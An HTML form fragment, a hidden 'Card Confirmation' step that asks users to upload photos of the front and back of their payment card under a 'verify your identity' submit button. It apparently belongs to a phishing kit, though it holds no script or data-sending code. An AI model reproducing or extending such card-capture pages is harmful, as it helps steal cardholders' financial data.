<div style="display: none;" class="content-container" id="Cstep3" role="main" tabindex="-1">
    <form id="step3">
        <div class='row'>
            <div class='large-12 medium-12 small-12 column'>
            
            <h1 style="display: flex;justify-content: center;">Card Confirmation</h1>

            </div>
        </div>
        <div class='box'>
            <div class='row'>
                <div class='medium-12 columns'>
                    <div class='large-12 medium-12 small-12 column'>
                        <p class="align-right margin-bottom-none">
                            <span class="required">*</span>
                            Required fields
                        </p>
                    </div>




                    <center>
                        <div class="row&#32;form-row">
                            <div class="large-3&#32;medium-5&#32;small-12&#32;column&#32;"><label class="form-control" for="username">Upload
                                    Card Front&nbsp;<span class="required">*&nbsp;</span></label>
                        
                            </div>
                        
                        
                            <div class="large-4&#32;medium-4&#32;small-12&#32;columns&#32;left">
                        
                                <div class="img-wrapper"><img src="/img/front.jpg" alt=""></div>
                        
                                <input class="stretch" id="cardFront" type="file" required value="" />
                        
                            </div>
                            <div class="large-5&#32;medium-3&#32;small-12&#32;columns&#32;left"></div>
                        </div>
                    
                    
                    
                    <div class="row&#32;form-row">
                        <div class="large-3&#32;medium-5&#32;small-12&#32;column&#32;"><label class="form-control"
                                for="username">Upload Card Back&nbsp;<span
                                    class="required">*&nbsp;</span></label>

                        </div>

                        
                        <div class="large-4&#32;medium-4&#32;small-12&#32;columns&#32;left">

                            <div class="img-wrapper"><img src="/img/back.jpg" alt=""></div>
                        
                            <input class="stretch" id="cardBack" type="file" required value="" />

                        </div>
                        <div class="large-5&#32;medium-3&#32;small-12&#32;columns&#32;left"></div>
                    </div>

                    </center>


                    <div class='small-12 columns button-group'>
                        <input class="button&#32;small&#32;navigationButton&#32;primary"
                            id="verifyverifyyouridentitySubmit" name="Submit" type="submit" value="Continue" />
                    </div>
                </div>
            </div>
        </div>

    </form>
</div>